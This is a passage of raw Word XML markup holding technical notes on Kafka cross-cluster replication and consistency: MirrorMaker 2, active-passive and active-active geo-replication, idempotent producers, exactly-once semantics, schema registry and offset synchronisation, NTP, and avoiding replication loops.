          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> translation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545EDCD6"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helps consumers </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resume from the same position</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the target cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564AF0F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6DC31">
          <v:rect id="_x0000_i3554" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="140BC06D"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Fault Tolerance with Quorum-Based Replication (KRaft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E1D703"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KRaft mode (removes Zookeeper) has built-in </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metadata consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70025784"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ers better consistency guarantees in multi-node/multi-region clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E46375"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7A2608">
          <v:rect id="_x0000_i3555" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C846C2"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Data Validation Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F76B6" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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118A1616"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for replication monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797E0808"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Exporter</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for consumer lag and offset validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73070407"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ustom checksum verification for message-level integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F327AC0"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1DFC5">
          <v:rect id="_x0000_i3556" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9BFB7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3803"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="790E9013" w14:textId="77777777" w:rsidTr="00DF5B7A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="410B6E88"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E9C30F1"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715324F" w14:textId="77777777" w:rsidTr="00DF5B7A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EBA12ED"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0374E8D7"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 &amp; offset replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="41A15210" w14:textId="77777777" w:rsidTr="00DF5B7A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4337CF0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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F0D05B8"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="22D65F2C" w14:textId="77777777" w:rsidTr="00DF5B7A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64D6111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ctly-Once Semantics (EOS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0359B08A"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accuracy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="5CA76859" w14:textId="77777777" w:rsidTr="00DF5B7A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="150DE7F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gistry replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5187AA9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essage format compatibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="70C79C6F" w14:textId="77777777" w:rsidTr="00DF5B7A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D5AF8D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replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4609607E"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3E573FC5" w14:textId="77777777" w:rsidTr="00DF5B7A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34C9464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stent configs + NTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="289A3104"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logical inconsistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58B397C4" w14:textId="590E8E48"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557" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD22CD7" w14:textId="7B8280FE" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00F04107" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="878" w:name="_Toc197868092"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="878"/>
    </w:p>
    <w:p w14:paraId="3D00A608" w14:textId="557E012D" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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data consistency and replication across Kafka clusters</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, especially in </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-datacenter (multi-region)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> setups, is crucial for fault tolerance, disaster recovery, and low-latency access. Here are the key </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>strategies and best practices</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure reliable data replication and consistency across Kafka clusters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEE5280"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B7710">
          <v:rect id="_x0000_i3558" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDFF14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Kafka MirrorMaker / MirrorMaker 2 (MM2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53384FD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 (Recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325CC307"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2BB2B30B"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replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018B7C20"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matically replicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2583E8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D424289"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offsets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FF4C40"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nfiguration metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1CFBDB"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34F6DAC6"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amless </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cross-datacenter replication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D33AC14"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tains </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message order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artitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425D666A"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ows </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>failover and disaster recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142EC0C2"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so consumers can resume processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A59A8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mple:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C272FB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nect-mirror-maker.sh mm2.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F9D6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53AC68">
          <v:rect id="_x0000_i3559" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D25A12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Geo-Replication Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A3316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Passive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAA0751"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e cluster handles writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E7874A"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assive cluster is used for DR (Disaster Recovery).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683E0C0E"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conflict risk, simple to implement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F615DB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Active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4553F24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oth clusters handle writes and reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4082FA6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quires </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>conflict resolu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edu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idempotent processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCDA62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event IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manage duplicates across clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6CD4E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D48B">
          <v:rect id="_x0000_i3560" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="392F8EFC"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708D2BD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enable.idempotence", "true");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6DBB2"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that </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retries do not result in duplicate messages</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B735B9"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mportant when using </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MirrorMaker 2</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or custom replication logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A94D00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BAC45">
          <v:rect id="_x0000_i3561" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FC6905"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xactly Once Semantics (EOS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3355903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ensure </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exact delivery without duplication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7489D4E2" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B8D291"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 = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B72F73D"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 = all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6483D4F2"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Kafka Transactions API</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308D366F"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7C8963">
          <v:rect id="_x0000_i3562" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="346E171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chema Registry Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E78B43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 Schema Registry with Multi-Region support</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A72455"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consistent message formats</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6229B61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schema mismatches that may lead to consumer errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753C12EE"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AF8F41">
          <v:rect id="_x0000_i3563" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAF2E9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ffset Synchronization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079B5A0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 replicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDAA6F2"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group offsets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78438646"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xml:space="preserve"> to keep consumers in sync between clusters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51832F1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failover</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> scenarios without starting from the beginning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B1F1A7"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1786DB">
          <v:rect id="_x0000_i3564" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35904FE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Consistent Configuration Across Clusters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5678F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C1F22"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topic names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF32F3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number of partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6674D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imilar </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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compac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replication configs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C663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ensures smooth failover and data compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0B3D1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9D5C05">
          <v:rect id="_x0000_i3565" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C32F8F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Monitoring and Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A85E742"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0E05AC6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metheus + Grafana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB42565"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Exporter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0B40B9"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for consumer lag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BED96B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A79A0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eplication lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CD4600"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offsets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78035C11"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throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EFF1DC"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integrity (checksum validation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171E5E2A"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E00B34">
          <v:rect id="_x0000_i3566" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="030F318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ime Synchronization (NTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EC9BD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brokers, producers, and consumers must sync time using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to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2823EBCA"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correct </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>timestamp-based retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05197D07"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event order consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE247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8621">
          <v:rect id="_x0000_i3567" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E291E61"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Avoiding Infinite Replication Loops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F377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topic renam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replication filters</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent MM2 from </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>re-replicating topics back and forth</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7FD454"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8A1B0">
          <v:rect id="_x0000_i3568" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
